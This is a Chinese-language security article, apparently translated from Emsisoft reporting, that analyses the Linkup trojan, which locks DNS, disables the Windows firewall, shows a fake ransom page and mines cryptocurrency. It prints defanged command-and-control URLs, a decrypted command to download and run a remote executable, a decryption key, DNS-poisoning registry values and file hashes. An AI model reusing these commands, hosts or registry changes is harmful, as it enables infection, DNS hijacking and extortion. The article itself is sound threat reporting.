悄悄的干活,打枪的不要!勒索+比特币挖矿木马
FreeBuf曾报道过一些勒索用户支付赎金的木马:
英国NCA向公众发出警告:CryptoLocker恶意程序肆虐网络
Emsisoft团队最近发现了一款名为"Linkup"的木马(Trojan-Ransom.Win32.Linkup),Linkup不会直接加密电脑中的档案,而是直接关闭Windows防火墙服务、锁定你的DNS然后让你的机器辅助挖比特币。
这一切当然是悄悄的进行的,当你不能正常上网了之后会发现浏览器经常会访问这个网页:
或者这样:
看似一本正经的 Council of Europe 的页面 (体验一下: 62.75.221.37),甚至会警告你观看“儿童色情”,只需0.01欧元就可以立即恢复网络链接。
一旦Linkup执行后,会在%AppData%\Microsoft\Windows文件夹下创建svchost.exe,然后禁用windows的安全和防火墙服务:
Linkup会向服务器以加密的形式POST你机器的信息:
token解密后大致是这样:
uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU&wv=5.1.2600.SP3.0.256.1.2.x86&ia=1
这包含了你的编号,系统的版本,使用的是何种语言。这样会方便木马的感染,让Linkup知道在什么样的机器上工作并且是否在正常工作。
Linkup使用了冗余机制,解密后会发现准备了多台C&C服务器:
hxxp://62.75.221.37/uplink.php?logo.jpg hxxp://hoseen45r.com/uplink.php?logo.jpg hxxp://onetimes21s.com/uplink.php?logo.jpg hxxp://setpec14rs.com/uplink.php?logo.jpg
C&C服务器会向Linkup发送如下加密后的指令:
nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV
解密的key是
Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI
解开后是这样的(如图):
IL 62.75.221.37 RUN hxxp://91.220.163.22/pts2.exe
IL 62.75.221.37 命令会重定向每一条http请求到勒索的页面上。同样,Linkup 也在注册表中做了手脚:
-
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%"NameServer" = "127.0.0.1" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%"DhcpNameServer" = "127.0.0.1"
重启服务,保证DNS毒化成功:
RUN hxxp://91.220.163.22/pts2.exe 命令会让你的计算机下载并运行 pts2.exe , pts2.exe会伪装成Svchost.exe并下载hxxp://64.32.28.155/b.exe,b.exe会存储在C:\Users\Public\b.exe 。这是一个自解压程序,其中的脚本会释放一个64位的PE文件,命名为j.exe ,也就是jhProtominer 。正如其名称所暗示的, jhProtominer是一个Protoshares挖掘应用程序。
黑客利用Linkup获得了更强的计算能力来获取更多的比特币,为了使挖矿僵尸网络间保持通信流畅,毒化了dns并顺便想要敲诈受害者一笔(钱或重要口令和个人信息)。
来自Emsisoft团队的相关文件hash:
Trojan-Ransom.Win32.LinkupMD5: f1304992523cd68f7412a355d2fb9d5dSHA1: ce70e50707b456e0e2f086126bdcfa266d5a57ae pts2.exe (Trojan-Downloader.Win32.Linkup)MD5: 7eb809d8ea5bfe602648752289669632SHA1: 20bd75b9c47ac075d51783a5f3c5309091c7c6a7 b.exe (Trojan.Win32.Miner – Self-extracting Archive)MD5: 29eea4cd040bff1028d5b6092f22f9bfSHA1: 1b3389328f9ebf706f09445ca0adc5efd2e98f79 j.exe (jhProtominer)MD5: 2e9a71e4ee33d190056e081e6726fa56 SHA1: db355fc276b8174e1753f45dbdf52536f7740316
[翻译:嘎巴嘎巴,参考:emsisoft:cryptolocker-a-new-ransomware-variant THN:linkup-first-ransomware-trojan-that]